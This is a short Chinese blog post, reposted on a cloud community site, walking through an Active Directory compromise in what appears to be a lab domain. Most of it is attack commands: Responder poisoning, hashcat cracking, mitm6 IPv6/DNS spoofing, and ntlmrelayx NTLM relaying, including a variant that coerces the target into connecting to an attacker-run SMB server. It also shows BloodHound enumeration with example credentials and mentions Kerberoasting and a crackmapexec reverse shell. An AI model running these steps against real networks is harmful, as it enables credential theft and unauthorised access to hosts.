前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Active Directory主机上线案例

Active Directory主机上线案例

作者头像
鸿鹄实验室
发布2021-04-15 10:46:02
3690
发布2021-04-15 10:46:02
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

  昨日听闻uzi退役,心里便十分失落,我不打LOL,但是很喜欢看LPL,于是水文一篇,纪念青春。

首先使用responder进行监听:

代码语言:javascript
复制
responder -I vmnet0

获取到hash:

使用hashcat破解hash得到明文密码,或者后续进行ntlmreply:

除此之外我们还能使用mitm6进行dns、ipv6欺骗:

代码语言:javascript
复制
python mitm6.py -d offensive.org

Dns成功被欺骗:

然后另开一个终端做如下操作:

代码语言:javascript
复制
python3 ntlmrelayx.py -wh 192.168.0.9 -t smb://192.168.0.84/ -i

除了这种之外,依然可以使用下面的方法获取到hash:

代码语言:javascript
复制
python3 ntlmrelayx.py -wh 192.168.0.9 -t smb://192.168.0.84/  --no-smb-server -c "net use \\192.168.0.9\"
代码语言:javascript
复制
python3 smbserver.py -smbsupport SMB /root

此时我们可以去破解hash,也可以使用上面的方法无文件上线session。

然后使用上面的hash来进行操作,使用猎犬:

代码语言:javascript
复制
 python3 bloodhound.py -d offensive.org -u kss -p abc123! -gc dm.offensive.org -c all 

获取到目标的信息。

拿到之后,我们可以尝试Kerberoasting攻击。

没有的话,也没关系,我们可以使用crackmapexec进行反弹shell.

然后我们就获得了一个简单的主机会话。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-06-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档